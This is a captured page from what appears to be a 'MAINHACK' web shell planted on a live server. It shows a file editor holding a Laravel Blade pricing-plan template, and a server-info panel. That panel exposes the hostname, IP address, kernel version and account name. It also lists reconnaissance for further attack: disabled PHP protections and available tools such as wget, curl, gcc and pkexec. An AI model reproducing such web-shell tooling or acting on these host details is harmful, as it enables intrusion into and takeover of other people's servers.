[
MAINHACK
]
Mail Test
BC
Config Scan
HOME
Create...
New File
New Folder
Viewing / Editing File: plan.blade.php
<section class="pricing-plan-section plans-list"> <div class="container"> <div class="section-title text-center"> <h2>{{ $page_data['headings']['pricing_title'] ?? '' }}</h2> <p class="section-description"> {{ $page_data['headings']['pricing_description'] ?? '' }} </p> <div class="d-flex align-items-center justify-content-center gap-4"> <div class="w-100 d-flex flex-column align-items-center"> <div class="tab-content w-100"> <div class="tab-pane fade show active" id="nav-monthly" role="tabpanel" aria-labelledby="nav-monthly-tab"> <div class="row"> @foreach ($plans as $plan) <div class="col-12 col-md-6 col-lg-4 mt-3"> <div class="card"> <div class="card-header py-3 border-0 font-size-update"> <p>{{ $plan['subscriptionName'] ?? '' }}</p> <h4> @if (($plan['offerPrice'] && $plan['subscriptionPrice'] !== null) || $plan['offerPrice'] || $plan['subscriptionPrice']) @if ($plan['offerPrice']) {{ currency_format($plan['offerPrice']) }} @else {{ currency_format($plan['subscriptionPrice']) }} @endif @else @if ($plan['offerPrice'] || $plan['subscriptionPrice']) {{ currency_format($plan['offerPrice'] ?? $plan['subscriptionPrice']) }} @else {{ __('Free') }} @endif @endif <span class="price-span">/{{ $plan['duration'] . ' Days' }}</span></small> </h4> </div> <div class="card-body text-start"> <p>{{ __('Features Of Free Plan') }} 👇</p> <ul> @foreach ($plan['features'] ?? [] as $key => $item) <li> <i class="fas {{ isset($item[1]) ? 'fa-check-circle text-success' : 'fa-times-circle text-danger' }} me-1"></i> {{ $item[0] ?? '' }} </li> @endforeach </ul> <a class="btn subscribe-plan d-block mt-4 mb-2" data-plan-id="{{ $plan->id }}" data-google-url="{{ url('login/google?plan_id=') . $plan->id }}" data-x-url="{{ url('login/x?plan_id=') . $plan->id }}">{{ __('Buy Now') }}</a> </div> </div> </div> @endforeach </div> </div> </div> </div> </div> </div> </div> </section> <input type="hidden" value="{{ route('get-business-categories') }}" id="get-business-categories">
Save Changes
Cancel / Back
Close ×
Server Info
Hostname: server1.winmanyltd.com
Server IP: 203.161.60.52
PHP Version: 8.3.27
Server Software: Apache
System: Linux server1.winmanyltd.com 4.18.0-553.22.1.el8_10.x86_64 #1 SMP Tue Sep 24 05:16:59 EDT 2024 x86_64
HDD Total: 117.98 GB
HDD Free: 59.84 GB
Domains on IP: N/A (Requires external lookup)
System Features
Safe Mode:
Off
disable_functions:
None
allow_url_fopen:
On
allow_url_include:
Off
magic_quotes_gpc:
Off
register_globals:
Off
open_basedir:
None
cURL:
Enabled
ZipArchive:
Enabled
MySQLi:
Enabled
PDO:
Enabled
wget:
Yes
curl (cmd):
Yes
perl:
Yes
python:
Yes (py3)
gcc:
Yes
pkexec:
Yes
git:
Yes
User Info
Username: eliosofonline
User ID (UID): 1002
Group ID (GID): 1003
Script Owner UID: 1002
Current Dir Owner: 1002